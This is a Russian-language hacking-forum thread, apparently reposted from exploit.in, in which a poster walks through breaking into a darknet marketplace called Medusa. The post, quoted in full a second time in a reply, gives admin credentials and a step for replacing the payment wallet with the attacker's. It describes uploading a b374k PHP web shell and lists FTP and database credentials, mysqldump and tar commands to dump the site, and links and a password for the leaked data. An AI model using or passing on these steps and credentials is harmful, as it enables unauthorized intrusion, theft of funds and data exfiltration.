Сливаем MEDUSA - НакроФейкШоп

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 333
Некий утырок, решил создать аналог Hydra.
Но на Monero ну и как обычно) кидалово.
УРЛ этого чуда в торе medusas6rqee6x6e.onion


залазием

админка
Код с оформлением (BB-коды):
http://medusas6rqee6x6e.onion/tesla/login
feret
feret123

тут стоит дальше бейсик, но мы сморкнулись и уже залогинены.

далее идем на http://medusas6rqee6x6e.onion/tesla/setting
в поле "BTC кошелек для пополнения баланса"  можно подменить его кошелек на наш (Monero) ыыыыы

и далее идем на:
http://medusas6rqee6x6e.onion/tesla/elfinder
и льем PHP шелл (лучше b374k(он идеально там работает)
и далее ловим его тут:
http://medusas6rqee6x6e.onion/storage/uploads/ - shell.php


инфа

Код с оформлением (BB-коды):
http://medusas6rqee6x6e.onion/webftp/ - ихнее фтп, работает анонимный доступ. (anonymous:anonymous)

https://181.174.166.213:2031/pma/index.php - mysql
mysqldump -u meduzav2_meduza -p  beOth9SL meduzav2_meduza

далее инфа:

mysqldump -umeduzav2_meduza -p  beOth9SL meduzav2_meduza > "medusa_$dt.sql"
tar --exclude="meduza.hybra2web.cn/.git" --exclude="meduza.hybra2web.cn/vendor" --exclude="meduza.hybra2web.cn/node_modules" -czvf "medusa_$dt.tar.gz" meduza.hybra2web.cn

пути
/home/meduzav2/public_html/meduza.hybra2web.cn/public/uploads/files/
/home/meduzav2/public_html/meduza.hybra2web.cn/public/vendor/adminlte/bower_components/datatables.net/js/data.php
b374k   (шелл, уже удалили, но лейте чтото типа b374k)

http://medusas6rqee6x6e.onion/vendor/adminlte


уже слитая инфа (СКРИПТЫ и БАЗА)

Код с оформлением (BB-коды):
скачать скрипты https://files.fm/f/4nvgav86
скачать базу https://files.fm/f/tfraqncu

p.s файлы живут 2 месяца
пароль на архив

Код:
gfcvh34CFVGBHjxexploit.in
всем успехов) не вредите друг другу) кому было полезно - зашибись)



u3OiWbt.png



взято с exploit.in
автор @MegaDostup
 
Пожалуйста, обратите внимание, что пользователь заблокирован
интересно.
Некий утырок, решил создать аналог Hydra.

получается чел ломал фейк не ради интереса, а в интересах реального шопа ? или мне показалось )
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Некий утырок, решил создать аналог Hydra.
Но на Monero ну и как обычно) кидалово.
УРЛ этого чуда в торе medusas6rqee6x6e.onion


залазием

админка

Код с оформлением (BB-коды):
http://medusas6rqee6x6e.onion/tesla/login
feret
feret123

тут стоит дальше бейсик, но мы сморкнулись и уже залогинены.

далее идем на http://medusas6rqee6x6e.onion/tesla/setting
в поле "BTC кошелек для пополнения баланса"  можно подменить его кошелек на наш (Monero) ыыыыы

и далее идем на:
http://medusas6rqee6x6e.onion/tesla/elfinder
и льем PHP шелл (лучше b374k(он идеально там работает)
и далее ловим его тут:
http://medusas6rqee6x6e.onion/storage/uploads/ - shell.php


инфа

Код с оформлением (BB-коды):
http://medusas6rqee6x6e.onion/webftp/ - ихнее фтп, работает анонимный доступ. (anonymous:anonymous)

https://181.174.166.213:2031/pma/index.php - mysql
mysqldump -u meduzav2_meduza -p  beOth9SL meduzav2_meduza

далее инфа:

mysqldump -umeduzav2_meduza -p  beOth9SL meduzav2_meduza > "medusa_$dt.sql"
tar --exclude="meduza.hybra2web.cn/.git" --exclude="meduza.hybra2web.cn/vendor" --exclude="meduza.hybra2web.cn/node_modules" -czvf "medusa_$dt.tar.gz" meduza.hybra2web.cn

пути
/home/meduzav2/public_html/meduza.hybra2web.cn/public/uploads/files/
/home/meduzav2/public_html/meduza.hybra2web.cn/public/vendor/adminlte/bower_components/datatables.net/js/data.php
b374k   (шелл, уже удалили, но лейте чтото типа b374k)

http://medusas6rqee6x6e.onion/vendor/adminlte


уже слитая инфа (СКРИПТЫ и БАЗА)

Код с оформлением (BB-коды):
скачать скрипты https://files.fm/f/4nvgav86
скачать базу https://files.fm/f/tfraqncu

p.s файлы живут 2 месяца
пароль на архив

Код:
gfcvh34CFVGBHjxexploit.in
всем успехов) не вредите друг другу) кому было полезно - зашибись)



u3OiWbt.png



взято с exploit.in
автор @MegaDostup

Бро, перезалей пожалуйста!!))
 
Последнее редактирование:
new link:


 
just tested the download myself... no errors, everything fine.
/usr/bin/gtar: meduza.hybra2web.cn/public/storage: Cannot create symlink to `/home/meduzav2/public_html/meduza.hybra2web.cn/storage/app/public': No such file or directory
/usr/bin/gtar: Exiting with failure status due to previous errors
Снимsок.PNG
please upload MEGA
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Малость непонятно, почему народ выкладывал под хайд линки, когда сам ТС выдал их без хайда?
Если у кого остался в архивах поделитесь живыми линками для изучения!
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх